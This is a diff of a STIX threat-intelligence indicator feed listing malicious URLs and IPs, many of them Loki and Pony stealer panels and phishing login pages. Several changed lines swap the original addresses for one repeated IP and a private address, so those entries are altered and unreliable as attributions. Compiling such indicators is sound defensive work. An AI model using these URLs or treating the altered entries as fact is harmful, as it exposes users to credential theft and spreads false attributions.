CyberCrime","id":"indicator--2b38be23-b226-460e-9b17-4480e930f271","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:54:29.634Z","name":"mal_url: http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:29.634Z"} {"created":"2020-02-22T02:54:29.689Z","description":"TS ID: 55335562500; iType: mal_url; State: active; Org: Cloudflare; Source: 
CyberCrime","id":"indicator--0bfd644c-62ef-4f03-9d1d-304673d912f1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-22T02:54:29.689Z","name":"mal_url: http://pay-robokassa.net/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pay-robokassa.net/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:29.689Z"} {"created":"2020-02-22T02:54:47.42Z","description":"TS ID: 55335562476; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--a15df968-dec6-4122-811e-1144011d0653","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:54:47.42Z","name":"mal_url: http://nortonlilly.info/jb/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/jb/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:47.42Z"} -{"created":"2020-02-22T02:54:48.824Z","description":"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime","id":"indicator--11fec449-039c-4d64-aefa-210e96074633","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-40"],"modified":"2020-02-22T02:54:48.824Z","name":"mal_url: http://185.70.185.34/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.70.185.34/host/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:48.824Z"} +{"created":"2020-02-22T02:54:48.824Z","description":"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime","id":"indicator--11fec449-039c-4d64-aefa-210e96074633","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-40"],"modified":"2020-02-22T02:54:48.824Z","name":"mal_url: 
http://89.160.20.156/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/host/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:48.824Z"} {"created":"2020-02-22T02:54:49.84Z","description":"TS ID: 55335562466; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5d04eb73-cda3-4f22-bcaf-604660d26343","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:54:49.84Z","name":"mal_url: http://nortonlilly.info/ace1/st/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/ace1/st/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:49.84Z"} -{"created":"2020-02-22T02:54:51.052Z","description":"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-22T02:54:51.052Z","name":"mal_url: http://94.100.18.4/primfive/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.100.18.4/primfive/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.052Z"} +{"created":"2020-02-22T02:54:51.052Z","description":"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-22T02:54:51.052Z","name":"mal_url: http://89.160.20.156/primfive/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://89.160.20.156/primfive/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.052Z"} {"created":"2020-02-22T02:54:51.08Z","description":"TS ID: 55335562469; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--4913d346-5153-40a6-b5ab-9854e91f4ac6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:54:51.08Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/gold/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/gold/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.08Z"} {"created":"2020-02-22T02:54:57.998Z","description":"TS ID: 55335562501; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--abd1ec0d-3831-4ae8-93fd-fa22ed4d20fd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-22T02:54:57.998Z","name":"mal_url: http://dronius267.myjino.ru/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dronius267.myjino.ru/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:57.998Z"} {"created":"2020-02-22T02:54:58.082Z","description":"TS ID: 55335562493; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--21a62996-f4f5-4b77-be5d-4f84a7e7d084","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-22T02:54:58.082Z","name":"mal_url: http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:54:58.082Z"} 
-{"created":"2020-02-22T02:54:59.268Z","description":"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-22T02:54:59.268Z","name":"mal_url: http://193.142.59.88/primsix/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.88/primsix/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.268Z"} +{"created":"2020-02-22T02:54:59.268Z","description":"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-22T02:54:59.268Z","name":"mal_url: http://89.160.20.156/primsix/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/primsix/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.268Z"} {"created":"2020-02-22T02:54:59.71Z","description":"TS ID: 55335562514; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--0c36d9c7-4938-49c0-9704-38aeaee90f95","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:54:59.71Z","name":"mal_url: http://worldatdoor.in/nato/Pony/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/nato/Pony/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.71Z"} {"created":"2020-02-22T02:55:06.175Z","description":"TS ID: 55335562464; iType: mal_url; State: active; Org: JSC Digital Network; Source: 
CyberCrime","id":"indicator--af30a658-0eea-4daf-b26f-26f060e56bc9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:06.175Z","name":"mal_url: http://nortonlilly.info/jp/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/jp/login.php']","type":"indicator","valid_from":"2020-02-22T02:55:06.175Z"} {"created":"2020-02-22T02:55:16.703Z","description":"TS ID: 55335562478; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--6c50747b-39c8-48c7-9fdc-86427a702ce1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:55:16.703Z","name":"mal_url: http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:55:16.703Z"} {"created":"2020-02-22T02:55:26.13Z","description":"TS ID: 55335562507; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--a2d5be60-5ee7-4dc6-b626-f5af241f2da0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-45"],"modified":"2020-02-22T02:55:26.13Z","name":"mal_url: http://67.215.224.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://67.215.224.144/login']","type":"indicator","valid_from":"2020-02-22T02:55:26.13Z"} {"created":"2020-02-22T02:55:32.068Z","description":"TS ID: 55335562512; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: 
CyberCrime","id":"indicator--d1c9a2c5-972d-4de3-97b5-c8175e4a0c4c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-22T02:55:32.068Z","name":"mal_url: http://abyng.com/mg/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://abyng.com/mg/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:55:32.068Z"} -{"created":"2020-02-22T02:55:34.073Z","description":"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:34.073Z","name":"mal_ip: 192.64.118.182","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.64.118.182']","type":"indicator","valid_from":"2020-02-22T02:55:34.073Z"} -{"created":"2020-02-22T02:55:37.882Z","description":"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-22T02:55:37.882Z","name":"mal_ip: 185.141.24.100","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.141.24.100']","type":"indicator","valid_from":"2020-02-22T02:55:37.882Z"} +{"created":"2020-02-22T02:55:34.073Z","description":"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:34.073Z","name":"mal_ip: 
192.168.118.182","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.168.118.182']","type":"indicator","valid_from":"2020-02-22T02:55:34.073Z"} +{"created":"2020-02-22T02:55:37.882Z","description":"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-22T02:55:37.882Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-22T02:55:37.882Z"} {"created":"2020-02-22T02:55:50.468Z","description":"TS ID: 55335562509; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--8358dddf-0d73-48e3-b8cd-14dc1ba01c09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-22T02:55:50.468Z","name":"mal_url: http://d0lphin1337.xyz/autofarm/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://d0lphin1337.xyz/autofarm/admin.php']","type":"indicator","valid_from":"2020-02-22T02:55:50.468Z"} {"created":"2020-02-22T02:55:52.759Z","description":"TS ID: 55335562480; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f1deba70-4cd9-42a2-877f-9036b38c72b4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:55:52.759Z","name":"mal_url: http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:55:52.759Z"} 
-{"created":"2020-02-23T02:51:55.106Z","description":"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--516caba2-8889-4f32-96e6-e4874a705085","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:51:55.106Z","name":"mal_url: http://94.100.18.11/plugman/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.100.18.11/plugman/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.106Z"} +{"created":"2020-02-23T02:51:55.106Z","description":"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--516caba2-8889-4f32-96e6-e4874a705085","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:51:55.106Z","name":"mal_url: http://89.160.20.156/plugman/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/plugman/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.106Z"} {"created":"2020-02-23T02:51:55.126Z","description":"TS ID: 55342497247; iType: mal_url; State: active; Org: Clax Telecom Srl; Source: CyberCrime","id":"indicator--7ad4e7c7-e202-4d04-8bae-c717d36610e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-100"],"modified":"2020-02-23T02:51:55.126Z","name":"mal_url: http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.126Z"} {"created":"2020-02-23T02:52:00.436Z","description":"TS ID: 55342497248; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: 
CyberCrime","id":"indicator--015e9665-1524-4e79-841d-8038961e0250","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:52:00.436Z","name":"mal_url: http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:00.436Z"} {"created":"2020-02-23T02:52:11.479Z","description":"TS ID: 55342497260; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--457f24b0-3aff-4e1b-972b-80bbc70de290","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:52:11.479Z","name":"mal_url: http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:11.479Z"} 
@@ -564,7 +564,7 @@
 {"created":"2020-02-23T02:53:12.354Z","description":"TS ID: 55342497239; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1d8670e2-50f8-4595-bdb1-7152df77d2a7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:53:12.354Z","name":"mal_url: http://f0405230.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0405230.xsph.ru/login']","type":"indicator","valid_from":"2020-02-23T02:53:12.354Z"}
 {"created":"2020-02-23T02:53:17.566Z","description":"TS ID: 55342497249; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime","id":"indicator--f04e05b1-5cb4-4e30-8d2e-0e1b1bae7523","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:53:17.566Z","name":"mal_url: http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:17.566Z"}
 {"created":"2020-02-23T02:53:19.805Z","description":"TS ID: 55342497293; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ebf656cd-162d-40e8-8c3a-272285600583","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:53:19.805Z","name":"mal_url: http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:19.805Z"}
-{"created":"2020-02-23T02:53:27.698Z","description":"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-23T02:53:27.698Z","name":"mal_url: http://193.142.59.109/primone/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.109/primone/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.698Z"}
+{"created":"2020-02-23T02:53:27.698Z","description":"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-23T02:53:27.698Z","name":"mal_url: http://89.160.20.156/primone/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/primone/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.698Z"}
 {"created":"2020-02-23T02:53:27.735Z","description":"TS ID: 55342497263; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ff626727-4888-4cba-9257-470f0a70891a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:27.735Z","name":"mal_url: http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.735Z"}
 {"created":"2020-02-23T02:53:40.401Z","description":"TS ID: 55342497262; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--4ec240b7-0fb7-4d38-8312-841d8f43886b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:40.401Z","name":"mal_url: http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:40.401Z"}
 {"created":"2020-02-23T02:53:40.432Z","description":"TS ID: 55342497245; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--9d14574f-9af7-493d-84a2-f631570f1940","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-23T02:53:40.432Z","name":"mal_url: http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:40.432Z"}
@@ -577,14 +577,14 @@
 {"created":"2020-02-23T02:54:09.172Z","description":"TS ID: 55342497312; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--8dd72fce-4734-40a1-8e73-cf44c9319fe1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:09.172Z","name":"mal_url: http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:09.172Z"}
 {"created":"2020-02-23T02:54:15.807Z","description":"TS ID: 55342497294; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--27b834b0-4113-4eca-8989-d7ada85d0779","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:54:15.807Z","name":"mal_url: http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:15.807Z"}
 {"created":"2020-02-23T02:54:17.76Z","description":"TS ID: 55342497307; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--56334c71-2f84-4e09-a6cc-017577b99970","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:17.76Z","name":"mal_url: http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:17.76Z"}
-{"created":"2020-02-23T02:54:19.374Z","description":"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:19.374Z","name":"mal_ip: 162.144.13.146","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.144.13.146']","type":"indicator","valid_from":"2020-02-23T02:54:19.374Z"}
+{"created":"2020-02-23T02:54:19.374Z","description":"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:19.374Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-23T02:54:19.374Z"}
 {"created":"2020-02-23T02:54:25.477Z","description":"TS ID: 55342497258; iType: mal_url; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--8b4fe873-9b07-4985-9818-291623fc07b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-23T02:54:25.477Z","name":"mal_url: http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:25.477Z"}
 {"created":"2020-02-23T02:54:39.696Z","description":"TS ID: 55342497298; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--c3486bc6-ca92-469f-b0d0-fd8f5cd81580","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:54:39.696Z","name":"mal_url: http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:39.696Z"}
 {"created":"2020-02-23T02:54:39.976Z","description":"TS ID: 55342497308; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0748270e-f010-4598-a389-553d3fffcb48","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:39.976Z","name":"mal_url: http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:39.976Z"}
-{"created":"2020-02-23T02:54:40.035Z","description":"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime","id":"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-23T02:54:40.035Z","name":"mal_ip: 202.67.10.173","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '202.67.10.173']","type":"indicator","valid_from":"2020-02-23T02:54:40.035Z"}
+{"created":"2020-02-23T02:54:40.035Z","description":"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime","id":"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-23T02:54:40.035Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-23T02:54:40.035Z"}
 {"created":"2020-02-23T02:54:40.281Z","description":"TS ID: 55342497241; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--ed6fe1be-e6b6-436e-9d8f-f2440d34b32f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:54:40.281Z","name":"mal_url: http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:40.281Z"}
